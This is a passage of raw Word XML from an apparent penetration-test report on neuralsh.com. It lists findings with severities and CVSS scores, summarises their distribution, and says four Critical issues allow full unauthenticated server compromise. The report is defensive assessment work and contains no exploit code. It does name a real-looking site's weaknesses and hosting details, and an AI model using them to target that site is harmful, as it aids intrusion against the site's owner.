              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.3</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N-016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory Listing Enabled on Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.3</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N-020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shared Hosting Co-Tenant: onesala.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.1</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N-011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Information Disclosure via Error Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.7</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N-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SPF Softfail / DMARC Quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.1</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N-017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cPanel Version Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMTP Port 25 Transitioned from Filtered to Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 10: Complete findings register — neuralsh.com VAPT engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Severity Distribution and Risk Scoring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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Average CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8B0000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.68</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>25%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.82</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>35%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Total**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**20**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**6.6**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 11: Severity distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The average CVSS score of 6.6 places the overall risk posture at the High-Medium boundary. The four Critical findings collectively represent a complete server compromise path available to any unauthenticated attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The following positive security controls were also identified during the assessment — these represent existing investments that are functioning correctly:</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare WAF on main site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — blocks automated scanners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
